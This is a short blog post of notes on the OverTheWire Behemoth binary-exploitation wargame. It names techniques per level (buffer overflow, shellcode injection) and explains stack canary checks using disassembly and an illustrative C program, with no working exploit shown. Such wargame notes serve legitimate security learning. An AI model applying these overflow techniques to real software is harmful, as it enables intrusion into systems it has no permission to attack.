Saturday, April 30, 2016

Overthewire: Behemoth

Behemoth is the next suggested wargame after Narnia. It is still binary exploitation, but it does not provide the source code of the challenges, so players have to read the disassembly instead.

Behemoth0:
ltrace, strings

Behemoth1:
Shellcode injection, buffer overflow



Behemoth2:
Absolute addressing


Just a comment:
Reading the disassembly of main this time, we can see that stack canary protection has been enabled. You can see this in the following instructions: the canary is loaded from %gs:0x14 and stored in the frame in the prologue, then compared against %gs:0x14 again before main returns, with a mismatch ending in __stack_chk_fail.

   0x08048579 <+12>:    mov    %gs:0x14,%eax
   0x0804857f <+18>:    mov    %eax,0x9c(%esp)
   0x08048586 <+25>:    xor    %eax,%eax


   0x08048620 <+179>:    mov    0x9c(%esp),%edx
   0x08048627 <+186>:    xor    %gs:0x14,%edx
   0x0804862e <+193>:    je     0x8048635 <main+200>
   0x08048630 <+195>:    call   0x80483f0 <__stack_chk_fail@plt>
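The mechanism behind those instructions, as an added C example (not Behemoth's own code): a buffer sits below a canary slot, the canary is seeded on entry and re-checked on exit, and a copy that runs past the buffer is detected because it clobbers the canary first. The struct layout, the fixed TLS_CANARY constant (standing in for the value at %gs:0x14) and the canary_survives helper are all constructed for this illustration.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

/* Constructed frame mirroring the Behemoth2 layout: the buffer lies
 * below the canary slot (0x9c(%esp) in the disassembly), so a write
 * that overruns buf hits the canary before anything above it. */
struct frame {
    char     buf[16];
    uint32_t canary;   /* stands in for the saved copy of %gs:0x14 */
};

/* The real program reads this from thread-local storage (%gs:0x14);
 * a fixed constructed constant keeps the example deterministic. */
static const uint32_t TLS_CANARY = 0xA5C3E1F7u;

/* Returns 1 if the canary is intact after writing `len` bytes into buf,
 * 0 if the write reached the canary (the case __stack_chk_fail catches).
 * The write is clamped to the struct so the demo stays within defined
 * behaviour; buf is the first member, so offset 0 is the buffer start. */
int canary_survives(const unsigned char *data, size_t len)
{
    struct frame f;
    f.canary = TLS_CANARY;                 /* prologue: mov %gs:0x14,%eax ; mov %eax,0x9c(%esp) */
    if (len > sizeof f) len = sizeof f;
    memcpy(&f, data, len);                 /* the unchecked copy into buf */
    return (f.canary ^ TLS_CANARY) == 0;   /* epilogue: xor %gs:0x14,%edx ; je <ok> */
}

/* Number of bytes that fit in buf before the next byte touches the canary. */
size_t bytes_before_canary(void)
{
    return offsetof(struct frame, canary);   /* 16 for this layout */
}

int main(void)
{
    unsigned char in[20];
    memset(in, 'A', sizeof in);            /* constructed input: 20 x 'A' */
    printf("16 bytes: canary %s\n", canary_survives(in, 16) ? "intact" : "clobbered");
    printf("17 bytes: canary %s\n", canary_survives(in, 17) ? "intact" : "clobbered");
    printf("20 bytes: canary %s\n", canary_survives(in, 20) ? "intact" : "clobbered");
    return 0;
}
```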

